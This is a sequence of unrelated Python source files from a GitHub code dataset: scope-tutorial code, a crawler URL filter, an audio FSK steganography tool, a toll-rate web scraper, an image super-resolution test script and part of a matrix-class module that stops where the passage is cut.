","repo_name":"ParaQueNome/Desenvolvimento-Web-3","sub_path":"django/consumo_api/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74429708007","text":"#1:变量作用域(全局变量和局部变量)\na = 100 #全局变量\ndef f1():\n global a #如果要在函数内部改变全局变量的值,增加globle关键字声明\n print(\"全局变量:\" + str(a)) # 打印全局变量\n a = 300\n\nf1()\nprint(\"全局变量:\" + str(a))\n\nprint(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n\n#2:全局变量和局部变量同名测试\nb = 100\ndef f2():\n b = 3 #同名的局部变量\n print(\"局部变量:\" + str(b))\n\nf2()\nprint(\"全局变量:\" + str(b)) # b仍然是100,没有变化,因为没有用globle在函数内部声明,所以b的值不变\n\nprint(\"__________________________________________________\")\nprint(end='\\n\\n\\n')\n\n\n#3:输出局部变量和全局变量\n\nc = 100\ndef f3(a,b,c):\n print(a,b,c)\n print(locals()) #打印输出局部变量\n print(\"#\"*20)\n print(globals()) #打印输出全局变量\n\nf3(2,3,4)\nprint(end='\\n\\n\\n')\n\nprint(\"_____________________局部变量和全局变量效率测试_____________________________\")\n#3:局部变量和全局变量效率测试(局部变量的查询和访问速度比全局变量快,优先考虑使用,尤其是在循环的时候)\nimport math\nimport time\n\ndef test01():\n start = time.time()\n for i in range(10000000):\n math.sqrt(30) # math通过这个直接调用,就是全局变量\n end = time.time()\n print(\"全局变量耗时{0}\".format((end-start)))\n\n\ndef test02():\n dd = math.sqrt #直接把math下面的函数sqrt赋值给变量dd\n start = time.time()\n for i in range(10000000):\n dd(30)\n end = time.time()\n print(\"局部变量耗时{0}\".format((end-start)))\n\ntest01()\ntest02()","repo_name":"pod1019/www","sub_path":"my_py_test/mypy/变量作用域.py","file_name":"变量作用域.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18541356314","text":"import re\nfrom typing import Optional\n\n\ndef url_pattern_skip_check(url: str, url_pattern: Optional[str]):\n '''\n spiderへの引数にurl_patternがある場合、urlパターンチェックを行う。\n チェックの結果パターンと不一致の場合、スキップ対象(True)を返す。\n チェックの結果パターンと一致した場合、スキップ対象外(False)を返す。\n '''\n skip_flg:bool = False\n # if 'url_pattern' in kwargs: # url絞り込み指定あり\n if url_pattern: # url絞り込み指定あり\n # pattern = re.compile(kwargs['url_pattern'])\n pattern = re.compile(url_pattern)\n if pattern.search(url) == None:\n skip_flg = True\n\n return skip_flg","repo_name":"pubranko/BrownieAtelier","sub_path":"app/news_crawl/spiders/common/url_pattern_skip_check.py","file_name":"url_pattern_skip_check.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30654469358","text":"import sys\nimport wave as wav\nimport struct as st\nimport math as mt\nimport scipy\nimport numpy as np\nimport audiolab\n\n\ndef get_first_frequency(seedno):\n np.random.seed(seedno)\n if seedno > 7500:\n return np.random.randint(25001, 30000)\n return np.random.randint(20000, 25000)\n\ndef get_next_frequency(seedno):\n np.random.seed(seedno)\n if seedno > 25000:\n return np.random.randint(25001, 30000)\n return np.random.randint(20000, 25000)\n\nprint(\"Please choose one of the following options:\")\nprint(\"1. Encode text into audio file.\")\nprint(\"2. Decode text from audio file.\")\nprint(\"3. Hide endoded message in another audio file.\")\nchoice = int(input(\"Your choice: \"))\nprint(\"-----------------\")\n\n\n###### Encode text message ######\nif choice == 1:\n message_str = str(input(\"Enter text message to encode: \"))\n # These will be recalculated after each window for cryptographic security\n seed_mark_int = int(input(\"Enter the key for the mark frequencies (value between 7501 and 15000): \"))\n seed_space_int = int(input(\"Enter the key for the space frequencies (value between 1500 and 7500): \"))\n #Translates message from ascii to a binary list\n def message_to_bin(msg):\n out = []\n for i in msg:\n byte = []\n inInt= ord(i)\n top = 128\n byte.append(0)\n while top > 1:\n if (inInt/top) >= 1:\n byte.append(1)\n inInt -= top\n else:\n byte.append(0)\n top = top/2\n byte.append(int(inInt))\n byte.append(1)\n for i in byte[-1::-1]:\n out.append(i)\n return out\n #turns current byte into a sine wave and writes it to the file\n def write_sine(bit, myFile, mark_freq, space_freq):\n sine_wave = []\n if bit == 1:\n sine_wave = [np.sin(2 * np.pi * float(mark_freq) * i / 48000) for i in range(160)]\n else:\n sine_wave = [np.sin(2 * np.pi * float(space_freq) * i / 48000) for i in range(160)]\n for i in sine_wave:\n myFile.writeframes(st.pack(\"h\", int(i*pow(2, 14))))\n\n #creates a .wav file and the calls write_sine() to fill it\n def build_a_wav(filename):\n wavefile = wav.open(filename, 'wb')\n wavefile.setnchannels(1)\n wavefile.setsampwidth(2)\n wavefile.setframerate(48000)\n wavefile.setnframes(sizeof)\n wavefile.setcomptype('NONE', 'nocompression')\n mark_freq = get_first_frequency(seed_mark_int)\n space_freq = get_first_frequency(seed_space_int)\n for i in bits:\n write_sine(i, wavefile, mark_freq, space_freq)\n mark_freq = get_next_frequency(mark_freq)\n space_freq = get_next_frequency(space_freq)\n wavefile.close()\n\n filename = str(input(\"Please input a name for your file (include .wav)\"))\n bits = message_to_bin(message_str)\n sizeof = len(bits)*160\n build_a_wav(filename)\n print(\"Built your encoded wav file: \" +filename+\".wav\")\n \n\n###### Decode text message ######\nelif choice == 2:\n file = str(input(\"Enter audio path to decode: \"))\n seed_mark_int = int(input(\"Enter the key for the mark frequencies: \"))\n seed_space_int = int(input(\"Enter the key for the space frequencies: \"))\n wav_file = wav.open(file, 'rb') # Open the audio file.\n wav_channels = wav_file.getnchannels() # Get total number of channels.\n wav_frames = wav_file.getnframes() # Get total number of frames.\n frame_rate = wav_file.getframerate() # Frame rate.\n sample_size = int(frame_rate/300) # Frames sample size.\n mark_freq = get_first_frequency(seed_mark_int) # Mark frequency. (updated for crypto)\n space_freq = get_first_frequency(seed_space_int) # Space frequency. (updated for crypto)\n\n print(sample_size)\n print(\"rate: \", frame_rate)\n print(\"frames: \", wav_frames)\n print(\"width: \", wav_file.getsampwidth())\n print(\"channels: \", wav_channels)\n\n # Read frames as an array of bytes.\n wav_bytes = wav_file.readframes(wav_frames)\n\n # Convert frames from bytes to floating point.\n wav_floats = st.unpack(\"%ih\" % (wav_frames * wav_channels), wav_bytes)\n wav_floats = [float(i) / pow(2, 15) for i in wav_floats]\n\n # Goertzl filer.\n def filter(sample, filter_freq):\n target_filter = (2*mt.pi*filter_freq)/frame_rate\n normalize = np.exp(np.complex(0, target_filter*sample_size))\n coef = np.array([np.exp(np.complex(0, -target_filter * i))\n for i in range(sample_size)])\n return abs(normalize * np.dot(sample, coef))\n\n # Get the FSK bits\n def get_FSK(mark_freq, space_freq):\n bits = []\n # Iterate through the frames by sample size (160 frames/sample)\n for i in range(0, len(wav_floats), sample_size):\n # Get the next sample (160 frames)\n curr_sample = wav_floats[i: i + sample_size]\n\n # Get the mark/space size\n mark_size = filter(curr_sample, mark_freq)\n space_size = filter(curr_sample, space_freq)\n\t\t\n #Update mark and space Frequency\n mark_freq = get_next_frequency(mark_freq)\n space_freq = get_next_frequency(space_freq)\n # Comapre the mark/space size\n if(mark_size > space_size):\n bits.append(1)\n else:\n bits.append(0)\n return bits\n\n\n def get_message(fsk):\n message = \"\"\n for i in range(0, len(fsk), 10):\n current_byte = (fsk[i: i+10])[1:9] # Get the middle 8 bits\n pow = [2 ** j for j in range(8)] # Get powers of 2 for total bits\n ascii = np.dot(current_byte, pow) # Get the ascii value\n message += chr(ascii) # Convert ascii to char\n return message\n\n\n print(get_message(get_FSK(mark_freq, space_freq))) # Print the hidden message\n\n\nelif choice == 3:\n message_to_hide = str(input(\"Please enter the path of the encoded message to hide: \"))\n file_to_hide_in = str(input(\"Please enter the name of the file to hide the message in: \"))\n a, fs, enc = audiolab.wavread(message_to_hide)\n b, fs, enc = audiolab.wavread(file_to_hide_in)\n c = scipy.vstack((a, b))\n audiolab.wavwrite(c, 'hidden.wav', fs, enc)\n print(\"New file saved as 'hidden.wav'\")\n\nelse:\n print(\"Your input is not correct!\")\n\nsys.exit()\n","repo_name":"BaderAlshaya/Steganography","sub_path":"Steganography.py","file_name":"Steganography.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8223861253","text":"lista = []\npar = []\nimpar = []\nwhile True:\n n = int(input('Digite o valor: '))\n opcao = input('Deseja continuar?[S/N]').upper()\n lista.append(n)\n if n % 2 == 0:\n par.append(n)\n else:\n impar.append(n)\n if opcao == 'S':\n print('Continuando...')\n if opcao == 'N':\n print(f'A lista geral é {lista}'\n f'\\nA lista dos pares é {par}'\n f'\\nA lista dos impares é {impar}')","repo_name":"pemedeiros/python-CeV","sub_path":"pacote-download/CursoemVideo/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74682874407","text":"# Features to extract:\n# --------------------\n#\n# - Word counts for words that appear 5 times or more in the training set (transformed to lowercase)\n# - Count of: ?, !, ,
\"\n coordinates_pattern = r\"\\s*([^<]+)\\s*\"\n name_matches = re.findall(name_pattern, data)\n coordinates_matches = re.findall(coordinates_pattern, data)\n\n if len(name_matches) == len(coordinates_matches):\n data_list = []\n for name, coordinates in zip(name_matches, coordinates_matches):\n longitude, latitude, _ = coordinates.split(\",\")\n\n longitude = round(float(longitude.strip()), 7)\n latitude = round(float(latitude.strip()), 7)\n data_list.append([name.strip(), longitude, latitude])\n\n df = pd.DataFrame(data_list, columns=[\"Name\", \"Longitude\", \"Latitude\"])\n df[\"id\"] = df[\"Name\"].str.extract(r\"\\((\\d+)\\)$\")\n\n today_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n log_file_path = os.path.join(data_directory, f\"markers-{today_date}.csv\")\n logging.info(f\"Saving data to {log_file_path}\")\n df.to_csv(log_file_path, index=False)\n\n return df\n else:\n raise Exception(\n \"Number of names and coordinates don't match. Data extraction failed.\"\n )\n\n except requests.exceptions.RequestException as e:\n logging.error(f\"Failed to fetch data from the URL: {e}\")\n raise Exception(f\"Failed to fetch data from the URL: {e}\")\n \n\ndef categ_dict(df, link):\n \"\"\"\n Create dictionaries for ID to place and category mapping.\n\n Args:\n df (pandas.DataFrame): Dataframe containing extracted data.\n link (str): URL to fetch vehicle_categories information.\n\n Returns:\n tuple: Tuple containing dictionaries (id_name, cat_dict).\n \"\"\"\n try:\n id_name = dict(zip(df.id, df.Name))\n category_content = requests.get(link).text\n cat_soup = BeautifulSoup(category_content, \"lxml\")\n categories = cat_soup.find(\"select\", {\"class\": \"selectstyle\"})\n cat_text = categories.get_text()\n cat_list = list(cat_text.split(\"\\n\"))\n cat_list = cat_list[1::]\n cat_id = [0, 1, 2, 3, 4, 5, 6, 7]\n cat_dict = dict(zip(cat_id, cat_list))\n logging.info(\"Category dictionary created.\")\n return id_name, cat_dict\n except Exception as e:\n logging.error(f\"Error in creating category dictionary: {e}\")\n raise\n \n\ndef get_data(df, id_name, cat_dict):\n \"\"\"\n Fetch and process toll data from web sources and save to CSV.\n\n Args:\n df (pandas.DataFrame): Dataframe containing plaza information data.\n id_name (dict): ID name to place mapping.\n cat_dict (dict): Category mapping.\n \"\"\"\n df_final = pd.DataFrame()\n\n for i in df.id:\n data_to_concat = []\n\n for j in range(8):\n link = f\"https://datamall.lta.gov.sg/mapapp/pages/tables/{i}_table_{j}.html\"\n try:\n html_content = requests.get(link).text\n soup = BeautifulSoup(html_content, \"lxml\")\n rate_table = soup.find(\"table\", {\"class\": \"styler\"})\n\n if len(rate_table) != 3:\n rows_data = []\n\n for row in rate_table.find_all(\"tr\"):\n columns = row.find_all(\"td\")\n\n place = i\n days = j\n time = columns[0].text.strip()\n rates = columns[1].text.strip().replace(\"$\", \"\")\n\n rows_data.append(\n {\n \"plaza_name\": place,\n \"vehicle_cat\": days,\n \"time\": time,\n \"rates\": rates,\n }\n )\n\n df_temp = pd.DataFrame(rows_data)\n df_temp = df_temp.replace(\n {\"plaza_name\": id_name, \"vehicle_cat\": cat_dict}\n )\n df_temp[\"rates\"] = pd.to_numeric(df_temp[\"rates\"], errors=\"coerce\")\n data_to_concat.append(df_temp)\n except requests.exceptions.RequestException as e:\n logging.warning(f\"Failed to fetch data from URL {link}: {e}\")\n # Log the error and continue gracefully\n\n if data_to_concat:\n df_final = pd.concat([df_final] + data_to_concat, ignore_index=True)\n # logging.info(f\"Data concatenated and appended to df_final for plaza_id {i}\")\n\n if not df_final.empty:\n df_final[[\"vehicle_cat\", \"weekdays/weekends\"]] = df_final[\n \"vehicle_cat\"\n ].str.split(\"(\", expand=True)\n df_final[\"weekdays/weekends\"] = df_final[\"weekdays/weekends\"].str.replace(\n \")\", \"\"\n )\n\n today_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n log_file_path = os.path.join(data_directory, f\"toll-rates-{today_date}.csv\")\n df_final.to_csv(\n log_file_path, mode=\"a\", encoding=\"utf-8-sig\", header=True, index=False\n )\n logging.info(f\"Saved data to {log_file_path}\")\n\n\ndef get_latest_files(directory, file_pattern):\n \"\"\"\n Get the latest files from the directory based on the given pattern.\n\n Args:\n directory (str): Directory path.\n file_pattern (str): File name pattern.\n\n Returns:\n list: List of the latest files.\n \"\"\"\n if not os.path.exists(directory):\n logging.error(f\"The directory '{directory}' does not exist.\")\n raise FileNotFoundError(f\"The directory '{directory}' does not exist.\")\n\n files_with_timestamps = []\n for file in glob.glob(os.path.join(directory, f\"{file_pattern}*.csv\")):\n files_with_timestamps.append((file, os.path.getmtime(file)))\n\n files_with_timestamps.sort(key=lambda x: x[1], reverse=True)\n\n latest_files = [file[0] for file in files_with_timestamps[:2]]\n logging.info(f\"Latest files matching pattern '{file_pattern}' are {latest_files}\")\n return latest_files\n\n\ndef comparison(previous_file_path, current_file_path):\n \"\"\"\n Compare markers and toll data between previous and current data and save differences to CSV.\n\n Args:\n previous_file_path (str): Path to the previous file.\n current_file_path (str): Path to the current file.\n \"\"\"\n if \" toll\" in previous_file_path or \"toll\" in current_file_path:\n previous_df = pd.read_csv(previous_file_path)\n current_df = pd.read_csv(current_file_path)\n file = \"toll\"\n else:\n previous_df = pd.read_csv(previous_file_path, index_col=\"id\")\n current_df = pd.read_csv(current_file_path, index_col=\"id\")\n file = \"markers\"\n\n if previous_df.shape == current_df.shape:\n df_diff = previous_df.compare(current_df)\n if len(df_diff) == 0:\n print(f\"No change in {file} data\")\n logging.info(f\"No change in {file} data\")\n\n else:\n # renaming columns to appropriate names\n df_diff.columns = df_diff.columns.set_levels(\n [\"previous_df\", \"current_df\"], level=1\n )\n\n # flattening the multi-index\n df_diff.columns = [\"_\".join(col).strip() for col in df_diff.columns.values]\n\n # getting the current date and time\n today_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n\n # saving the difference file\n df_diff.to_csv(f\"{file}-difference-{today_date}.csv\", encoding=\"utf-8-sig\")\n logging.info(f\"Difference file saved to {file}-difference-{today_date}.csv\")\n print(\" Difference found\")\n\n else: \n print(\"Previous and current data shapes are different. Can't Compare\")\n logging.info(\"Previous and current data shapes are different. Can't Compare\")\n \n return\n\n\ndef main():\n try:\n # Create the data directory if it doesn't exist\n if not os.path.exists(data_directory):\n os.makedirs(data_directory)\n \n df = extract_plaza_info_from_kml(kml_path)\n id_name, cat_dict = categ_dict(df, link)\n get_data(df, id_name, cat_dict)\n \n # Get the latest toll data and markers files\n latest_tolldata_files = get_latest_files(data_directory, \"toll\")\n latest_markers_files = get_latest_files(data_directory, \"markers\")\n \n # Compare toll rates and markers between the latest files\n comparison(latest_markers_files[1], latest_markers_files[0])\n comparison(latest_tolldata_files[1], latest_tolldata_files[0])\n\n except Exception as e:\n logging.error(f\"Error in extraction and comparison: {e}\")\n raise\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Sachinshrma03/data-extraction-comparison","sub_path":"extractor-and-comparator.py","file_name":"extractor-and-comparator.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18099004584","text":"from threading import Thread\nfrom time import sleep\n\nfrom ... import application\nfrom .action import Action\nfrom .result import Result\n\n\nclass Agent:\n\n def __init__(self, grid, action_types):\n self.grid = grid\n self.action_types = action_types\n self.actions = []\n self.action_dict = {}\n self.states = {}\n self.state()\n\n self.__init_actions()\n\n def __init_actions(self):\n identifier = 0\n for cell in self.grid.cells:\n for at in self.action_types:\n action = Action(identifier, cell, at)\n self.actions.append(action)\n self.action_dict[identifier] = action\n identifier += 1\n\n def reset(self):\n application.init_keyboard()\n application.text.reset()\n\n def __next_state__(self):\n max_s = -1\n for v in self.states.values():\n if v > max_s:\n max_s = v\n return max_s + 1\n\n def state(self):\n if application.keyboard.__hash__() not in self.states:\n self.states[application.keyboard.__hash__()] = self.__next_state__()\n return self.states[application.keyboard.__hash__()]\n\n def start_demo(self):\n for a in self.actions:\n print(self.execute(a.identifier))\n import time\n time.sleep(0.5)\n\n def execute(self, action_id):\n def execute_wait(action):\n action.execute()\n sleep(action.action_type.duration)\n\n try:\n thread = Thread(target=execute_wait, args=(self.action_dict[action_id], ))\n thread.start()\n return Result(application.text.value, self.state(), bool(application.text.value))\n\n except KeyError:\n return f'Action {action_id} does not exist'\n","repo_name":"Devinpennings/keyboard-environment","sub_path":"logic/agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34328390549","text":"def determine_delimiter(filepath):\n delimiters = [',', '\\t', ';']\n\n delimiter_count = {}\n with open(filepath, 'r') as file:\n for line in file:\n for delimiter in delimiters:\n if delimiter in line:\n delimiter_count[delimiter] = delimiter_count.get(delimiter, 0) + 1\n\n return delimiter_count\n\nfile_path = '../../genomeprep/opensnp_txt/2406.23andme.1498.txt'\ndelimiter_counts = determine_delimiter(file_path)\nif delimiter_counts:\n print(\"Delimiter Counts:\")\n for delimiter, count in delimiter_counts.items():\n print(f\"{delimiter}: {count}\")\nelse:\n print(f\"No delimiter found in {file_path}\")\n","repo_name":"dnastory/metrix","sub_path":"scripts/delimiter.py","file_name":"delimiter.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40273799065","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 17 15:28:14 2021\r\n\r\n@author: 月光下的云海\r\n\"\"\"\r\n\r\nfrom MODELS.SLSR import SLSR as model\r\nimport argparse\r\nfrom DLL.utils import fspecial,GetBlurMtx\r\nimport numpy as np\r\nfrom glob import glob\r\nfrom PIL import Image\r\nimport tensorflow as tf\r\nfrom tensorflow.python.platform import gfile\r\nimport os\r\nfrom DLL.Valuation import psnr,ssim\r\nfrom time import time\r\nimport cv2 as cv\r\n\r\ndef test_SLSR_on_dataset(scale,path):\r\n \r\n data_set = os.path.split(path)[0]\r\n data_set = os.path.split(data_set)[-1]\r\n \r\n if not os.path.exists('./RESULT/SLSRx{}/'.format(scale)+data_set):\r\n os.makedirs('./RESULT/SLSRx{}/'.format(scale)+data_set)\r\n \r\n slsr = model(scale = scale,epoch = 0)\r\n blur_kernel = fspecial(kernel_size = 17,sigma = 4)\r\n iH = GetBlurMtx(blur_kernel,1,imshape = (16,16)).toarray().astype(np.float32)\r\n pbPath = \"./TRAINED_MODEL/SLSR_x{}.pb\".format(scale)\r\n sess = tf.Session(config = slsr.config)\r\n with gfile.FastGFile(pbPath,'rb') as f:\r\n graph_def = tf.GraphDef()\r\n graph_def.ParseFromString(f.read())\r\n sess.graph.as_default()\r\n tf.import_graph_def(graph_def,name = '')\r\n LR_tensor = sess.graph.get_tensor_by_name(\"images:0\")\r\n HR_tensor = sess.graph.get_tensor_by_name(\"add_100:0\")\r\n #H = tf.placeholder(shape = [256,256],dtype = tf.float32,name = 'H')\r\n H = sess.graph.get_tensor_by_name(\"H:0\")\r\n val_img_paths = glob(path)\r\n avg_psnr = 0\r\n for p in val_img_paths:\r\n fn = os.path.split(p)[-1]\r\n print(\"Testing on \"+ fn + ' ... ...')\r\n t = time()\r\n fn = os.path.splitext(fn)[0]\r\n hr = cv.imread(p)\r\n hr = Image.fromarray(hr.astype(dtype=np.uint8))\r\n \r\n lr = hr.resize((hr.size[0]//scale,hr.size[1]//scale), Image.BICUBIC)\r\n hr = np.array(hr)\r\n lr = np.array(lr).astype(np.uint8)\r\n lr = lr.reshape((1,)+lr.shape)\r\n #hr,lr = get_image(p, scale, None)\r\n res = sess.run(HR_tensor, feed_dict={LR_tensor: lr / 255.0, H:iH})\r\n \r\n res = res[0]*255.0\r\n res = res.clip(min = 0, max = 255)\r\n #res = res.astype(np.uint8)\r\n ipsnr,issim = psnr(hr,res),ssim(hr,res)\r\n print(\"Time Elapsed:\", time()-t,end = ' ')\r\n print('The PSNR:{:.4f} and SSIM:{:.4f}'.format(ipsnr,issim))\r\n avg_psnr += ipsnr\r\n #Image.fromarray(res).save('./RESULT/SLSRx{}/'.format(scale) +'/'+data_set+'/'+ fn +'_{:.4f}_{:.4f}.png'.format(ipsnr,issim))\r\n cv.imwrite('./RESULT/SLSRx{}/'.format(scale) +'/'+data_set+'/'+ fn +'_{:.4f}_{:.4f}.png'.format(ipsnr,issim),res)\r\n sess.close()\r\n print(\"Avg. :\",avg_psnr/len(val_img_paths))\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--scale', type=int, default = 4, help='Scale Factor')\r\nparser.add_argument('--path', type = str, default = './DATABASE/Set5/*.bmp')\r\nargs = parser.parse_args()\r\n\r\nif __name__ == '__main__':\r\n \r\n test_SLSR_on_dataset(args.scale,args.path)\r\n \r\n ","repo_name":"Bovbene/SLKPSR","sub_path":"test_SLSR_on_dataset.py","file_name":"test_SLSR_on_dataset.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17591030428","text":"import numpy as np\nfrom typing import Union, Tuple, Optional, cast\nfrom abc import abstractmethod\n\nclass MatrixBase(object):\n def __init__(self) -> None:\n super().__init__()\n\n self.shape = (1,1)\n self.ndim = 2\n\n def is_diagonal(self) -> bool:\n return self.shape[0] == self.shape[1]\n\n def __neg__(self)->'MatrixBase':\n return -1.0 * self\n\n @abstractmethod\n def asmatrix(self)->np.ndarray:\n pass\n\n @abstractmethod\n def __mul__(self, other: Union[float, complex, np.float64, np.complex128])->'MatrixBase':\n return NotImplemented\n\n __rmul__ = __mul__\n\n @abstractmethod\n def __matmul__(self, other: Union['MatrixBase', np.ndarray])->Union['MatrixBase',np.ndarray]:\n return NotImplemented\n\n @abstractmethod\n def __add__(self, other: 'MatrixBase')->'MatrixBase':\n return NotImplemented\n\n @abstractmethod\n def conjugate(self)->'MatrixBase':\n pass\n\n @property\n @abstractmethod\n def T(self)->'MatrixBase':\n pass\n\n conj = conjugate\n\n def __sub__(self, other)->'MatrixBase':\n return self + (-other)\n\n @abstractmethod\n def inv(self)->'MatrixBase':\n pass\n\n @abstractmethod\n def hash(self)->int:\n pass\n\nclass DenseMatrix(MatrixBase):\n def __init__(self, matrix: np.ndarray) -> None:\n assert isinstance(matrix, np.ndarray)\n assert matrix.ndim == 2\n self.data = matrix\n self.shape = cast(Tuple[int,int], matrix.shape)\n self.ndim = 2\n\n def hash(self)->int:\n return matrix_hash(self.asmatrix())\n\n def asmatrix(self)->np.ndarray:\n return self.data\n\n def inv(self)->'DenseMatrix':\n return DenseMatrix(np.linalg.inv(self.asmatrix()))\n\n def __neg__(self)->'DenseMatrix':\n return -1.0 * self\n\n @property\n def T(self):\n return DenseMatrix(self.data.T)\n\n def conjugate(self):\n return DenseMatrix(self.data.conjugate())\n\n conj = conjugate\n\n def __mul__(self, other)->'DenseMatrix':\n if np.isscalar(other):\n return DenseMatrix(self.data * other)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __matmul__(self, other)->Union['DenseMatrix', np.ndarray]:\n assert self.shape[1] == other.shape[0]\n assert isinstance(other, MatrixBase) or (isinstance(other, np.ndarray) and other.ndim<=2)\n if isinstance(other, np.ndarray):\n return self.asmatrix() @ other\n else:\n if isinstance(other, ScaledIdentityMatrix):\n return self @ other.to_diagonal_matrix()\n elif isinstance(other, DiagonalMatrix):\n res = np.zeros((self.shape[0], other.shape[1]), dtype=np.complex128) # make real if possible\n min_size = min(*other.shape)\n res[:, 0:min_size] = \\\n self.data[:, 0:min_size] * other.diagonals[None,:]\n return DenseMatrix(res)\n else:\n return DenseMatrix(self.data @ other.asmatrix())\n\n def __add__(self, other)->'DenseMatrix':\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape\n\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n\n\n\nclass ScaledIdentityMatrix(MatrixBase):\n \"\"\"\n Scaled Identity matrix with a rectangular shape\n \"\"\"\n def __init__(\n self,\n shape: Union[int, Tuple[int,int]],\n coeff: Union[complex, float, np.float64, np.complex128]\n )->None:\n assert type(coeff) in [complex, float, np.float64, np.complex128], type(coeff)\n self.shape = (0,0) # type: Tuple[int, int]\n if isinstance(shape, int):\n self.shape = (shape, shape)\n elif isinstance(shape, tuple):\n self.shape = shape\n else:\n raise ValueError(\"Invalid shape value!\")\n self.coeff = coeff # type: Union[complex, float, np.float64, np.complex128]\n self.ndim = 2 # type: int\n\n def hash(self)->int:\n return matrix_hash(self.coeff)\n\n def asmatrix(self) -> np.ndarray:\n return self.coeff * np.eye(N=self.shape[0], M=self.shape[1])\n\n def __neg__(self)->'ScaledIdentityMatrix':\n return -1.0 * self\n\n def inv(self)->'ScaledIdentityMatrix':\n if not self.is_diagonal():\n raise RuntimeError(\"A rectangular matrix is not invertible!\")\n return ScaledIdentityMatrix(self.shape, 1/self.coeff)\n\n @property\n def T(self) -> 'ScaledIdentityMatrix':\n return ScaledIdentityMatrix((self.shape[1], self.shape[0]), self.coeff)\n\n @property\n def diagonals(self)->np.ndarray:\n if not self.is_diagonal():\n raise RuntimeError(\"Diagonals of a rectangular matrix is ill defined!\")\n return np.full(self.shape[0], self.coeff)\n\n def conjugate(self)->'ScaledIdentityMatrix':\n return ScaledIdentityMatrix(self.shape, np.conjugate(self.coeff))\n\n conj = conjugate\n\n def __mul__(self, other)->'ScaledIdentityMatrix':\n if type(other) in [complex, float, np.float64, np.complex128]:\n return ScaledIdentityMatrix(self.shape, self.coeff*other)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __matmul__(self, other: Union[MatrixBase, np.ndarray])->Union[MatrixBase,np.ndarray]:\n assert self.shape[1] == other.shape[0], f\"{self.shape} {other.shape}\"\n assert isinstance(other, MatrixBase) or isinstance(other, np.ndarray)\n return self.to_diagonal_matrix() @ other\n\n def __add__(self, other: MatrixBase)->MatrixBase:\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape, f\"{self.shape} {other.shape}\"\n\n if isinstance(other, ScaledIdentityMatrix):\n return ScaledIdentityMatrix(self.shape, self.coeff + other.coeff)\n elif isinstance(other, DiagonalMatrix):\n return DiagonalMatrix(self.coeff*np.ones(self.shape[0]) + other.diagonals)\n elif isinstance(other, PartialDiagonalMatrix):\n return PartialDiagonalMatrix(\n ScaledIdentityMatrix(other.matrix.shape[0], self.coeff) + other.matrix,\n other.rest_dims)\n else:\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n\n def to_diagonal_matrix(self):\n \"\"\" Convert to a diagonal matrix \"\"\"\n return DiagonalMatrix(self.coeff*np.ones(min(*self.shape)), self.shape)\n\nclass DiagonalMatrix(MatrixBase):\n \"\"\"\n Diagonal matrix\n \"\"\"\n def __init__(self, diagonals, shape: Optional[Tuple[int,int]] = None)->None:\n assert diagonals.ndim == 1\n self._diagonals = diagonals\n self.ndim = 2\n if shape is None:\n self.shape = (diagonals.size, diagonals.size)\n else:\n self.shape = shape\n assert min(*self.shape) == diagonals.size, f\"{self.shape} {diagonals.size}\"\n\n def hash(self) -> int:\n return matrix_hash(self.diagonals)\n\n @property\n def diagonals(self) -> np.ndarray:\n return self._diagonals\n\n def __neg__(self)->'DiagonalMatrix':\n return -1.0 * self\n\n def inv(self) -> 'DiagonalMatrix':\n if not self.is_diagonal():\n raise RuntimeError(\"Must be a diagonal matrix!\")\n return DiagonalMatrix(1/self.diagonals)\n\n def asmatrix(self) -> np.ndarray:\n mat = np.zeros(self.shape, dtype=self.diagonals.dtype)\n min_size = min(*self.shape)\n for i in range(min_size):\n mat[i,i] = self.diagonals[i]\n return mat\n\n @property\n def T(self) -> 'DiagonalMatrix':\n return DiagonalMatrix(self.diagonals, shape=(self.shape[1], self.shape[0]))\n\n def conjugate(self) -> 'DiagonalMatrix':\n return DiagonalMatrix(self.diagonals.conjugate(), self.shape)\n\n conj = conjugate\n\n def __mul__(self, other) -> 'DiagonalMatrix':\n if type(other) in [complex, float, np.float64, np.complex128]:\n return DiagonalMatrix(self._diagonals * other, self.shape)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __add__(self, other) -> MatrixBase:\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape\n\n if isinstance(other, DenseMatrix):\n return DenseMatrix(other.asmatrix() + np.diag(self.diagonals))\n elif isinstance(other, ScaledIdentityMatrix):\n return DiagonalMatrix(self.diagonals + np.full(self.diagonals.size, other.coeff))\n elif isinstance(other, DiagonalMatrix):\n return DiagonalMatrix(self.diagonals + 